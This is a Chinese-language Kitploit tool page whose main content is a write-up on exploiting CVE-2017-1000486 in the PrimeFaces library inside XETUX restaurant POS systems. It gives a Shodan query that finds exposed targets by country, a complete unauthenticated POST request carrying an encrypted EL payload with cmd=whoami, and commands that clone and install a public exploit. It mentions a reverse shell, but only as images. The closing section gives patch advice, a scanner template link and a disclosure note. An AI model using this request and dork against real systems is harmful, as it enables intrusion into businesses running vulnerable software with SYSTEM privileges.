Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/jam620/primefaces
侦察漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制远程访问工具
GitHubjam620/primefaces

primefaces

利用 CVE-2017-1000486

查看仓库
32年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

从餐桌到代码:通过餐厅POS系统中的RCE漏洞之旅

这一次,我们偶然发现了一个存在于多个餐厅POS应用程序中的漏洞 XETUX,后者是餐厅监控和自动化解决方案。在巴拿马,它是许多餐厅广泛使用的工具。

该漏洞是一个RCE(远程代码执行),允许攻击者在未经验证的情况下执行代码,并在目标系统上获得权限。

2

1. 枚举

我们发现Xetux应用程序中存在一个名为primefaces的库,该库用于生成PDF。于是,我们决定在Shodan中搜索以识别潜在目标。

root@kitploit:~
http.title:"@XETUX" country:PA

搜索结果显示40个结果,全球范围内有334个。

1

我们开始检查一个不在巴拿马的目标是否存在漏洞。分析后端结果时,我们看到:

3

我们可以观察到该应用程序是以最高权限 nt authority\system 安装的。下面我们来解释发生了什么:

该应用程序使用Apache Tomcat作为服务器,后端使用Java。应用程序中使用了名为Primefaces的第三方库或插件。问题路径是端点 javax.faces.resource/dynamiccontent.properties.xhtml。

在搜索该库时,我们发现了一个漏洞。Primefaces以如下方式加载动态内容:

root@kitploit:~
/javax.faces.resource/dynamiccontent.properties.jsf?ln=primefaces&pfdrid=dY1NMdRjZ4sqkGAPrRzKkmxm5b1DSrlJ7VXTVU2i7gmrhtVAkmH7aR8cUk7h%2BTgl&forcereload=1523006610695&pfdrid_c=true

问题出在参数 pdfid 上:

pfdrid=dY1NMdRjZ4sqkGAPrRzKkmxm5b1DSrlJ7VXTVU2i7gmrhtVAkmH7aR8cUk7h%2BTgl

该参数的值是加密的,并且无法验证请求是否会被正确解密。不幸的是,如果他们没有修改默认密钥的值,就可以请求生成一个默认密钥,所以幸运的是,我们测试的所有目标都保留了默认密钥。

同样地,也可以使用Padbuster工具进行Padding Oracle Attack来获取密钥。以下是我们发出的请求:

root@kitploit:~
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: ip:9090
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 1643

pfdrt=sc&ln=primefaces&pfdrid=4xE5s8AClZxUxmyaZjpBstMXUalIgOJHOtvxel%2Fv4YXvibdOn52ow4M6lDaKd9Gb8JdQqbACZNWVZpVS%2B3sX1Hoizouty1mYYT4yJsKPnUZ0LUHDvN0GB5YLgX1PkNY%2B1ZQ%2FnOSg5J1LDyzAjBheAxLDODIVcHkmJ6hnJsQ0YQ8bMU5%2B%2BTqeD4BGqCZMDjP%2BZQvveiUhxsUC%2F%2BtPqnOgFSBV8TBjDSPNmVoQ9YcKTGelKuJjS2kCXHjcyz7PcQksSW6UUmKu9RhJ%2Bx3Mnx6j56eroVPWnM2vdYRt5An6cLo1YPXu9uqriyg1wgm%2F7xYP%2FUwP1q8wfVeyM4fOw2xJzP6i1q4VLHLXi0VYHAIgaPrZ8gH8XH4X2Kq6ewyrJ62QxBF5dtE3tvLAL5tpGxqek5VW%2BhZFe9ePu0n5tLxWmqgqni8bKGbGrGu4IhXhCJhBxyelLQzPGLCfqmiQwYX5Ime9EHj1k5eoWQzH8jb3kQfFJ0exVprGCfXKGfHyfKfLEOd86anNsiQeNavNL7cDKV0yMbz52n6WLQrCAyzulE8kBCZPNGIUJh24npbeaHTaCjHRDtI7aIPHAIhuMWn7Ef5TU9DcXjdJvZqrItJoCDrtxMFfDhb0hpNQ2ise%2BbYIYzUDkUtdRV%2BjCGNI9kbPG5QPhAqp%2FJBhQ%2BXsqIhsu4LfkGbt51STsbVQZvoNaNyukOBL5IDTfNY6wS5bPSOKGuFjsQq0Xoadx1t3fc1YA9pm%2FEWgyR5DdKtmmxG93QqNhZf2RlPRJ5Z3jQAtdxw%2BxBgj6mLY2bEJUZn4R75UWnvLO6JM918jHdfPZELAxOCrzk5MNuoNxsWreDM7e2GX2iTUpfzNILoGaBY5wDnRw46ATxhx6Q%2FEba5MU7vNX1VtGFfHd2cDM5cpSGOlmOMl8qzxYk1R%2BA2eBUMEl8tFa55uwr19mW9VvWatD8orEb1RmByeIFyUeq6xLszczsB5Sy85Y1KPNvjmbTKu0LryGUc3U8VQ7AudToBsIo9ofMUJAwELNASNfLV0fZvUWi0GjoonpBq5jqSrRHuERB1%2BDW2kR6XmnuDdZMt9xdd1BGi1AM3As0KwSetNq6Ezm2fnjpW877buqsB%2BczxMtn6Yt6l88NRYaMHrwuY7s4IMNEBEazc0IBUNF30PH%2B3eIqRZdkimo980HBzVW4SXHnCMST65%2FTaIcy6%2FOXQqNjpMh7DDEQIvDjnMYMyBILCOCSDS4T3JQzgc%2BVhgT97imje%2FKWibF70yMQesNzOCEkaZbKoHz498sqKIDRIHiVEhTZlwdP29sUwt1uqNEV%2F35yQ%2BO8DLt0b%2BjqBECHJzI1IhGvSUWJW37TAgUEnJWpjI9R1hT88614GsVDG0UYv0u8YyS0chh0RryV3BXotoSkSkVGShIT4h0s51Qjswp0luewLtNuVyC5FvHvWiHLzbAArNnmM7k%2FGdCn3jLe9PeJp7yqDzzBBMN9kymtJdlm7c5XnlOv%2BP7wIJbP0i4%2BQF%2BPXw5ePKwSwQ9v8rTQ%3D%3D&cmd=whoami
2. 反向外壳

如前所述,包含RCE的库是Primefaces,它有一个公开的漏洞利用工具 CVE-2017-1000486

我们将下载该漏洞利用工具来测试漏洞:

root@kitploit:~
git clone https://github.com/pimps/CVE-2017-1000486.git
cd CVE-2017-1000486
pip3 install -r requirements.txt

执行漏洞利用:

4

它会返回一个密钥和请求:

5

然后返回命令执行结果:

6

现在我们来获取反向shell,以获得对服务器的访问权限:

7

3. 最终注意事项
  • 需要指出的是,该漏洞不仅影响Xetux软件,它存在于Primefaces库中,也出现在其他应用程序中,例如 MaxView Storage Manager 和 DOCBOX。
  • 该漏洞的修复方案早在2017年就已发布,建议更新Primefaces。
  • 访问该端点无需身份验证,任何人都可以发送请求,因此应验证请求是否合法。
  • 如果您使用上述任何应用程序,我们提供Nuclei模板仓库,可用于检查是否存在漏洞:https://gitlab.com/t0adsec/nuclei-templates
  • 我们已负责任地向相关国家/地区的应用程序供应商报告了此问题,但截至目前尚未收到他们的回复。
4. 参考
  • XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行漏洞-CSDN博客. (s. f.). https://blog.csdn.net/holyxp/article/details/134402720
  • Gobysec. (s. f.). GobyVuls/GobyVuls-Document.md at master · gobysec/GobyVuls. GitHub. https://github.com/gobysec/GobyVuls/blob/master/GobyVuls-Document.md
  • Lindner, S. (2018, 26 abril). PrimeFaces Expression Language Remote Code Execution fix. illucIT Software GmbH. https://www.illucit.com/en/java-ee/primefaces-expression-language-remote-code-execution-fix
下载工具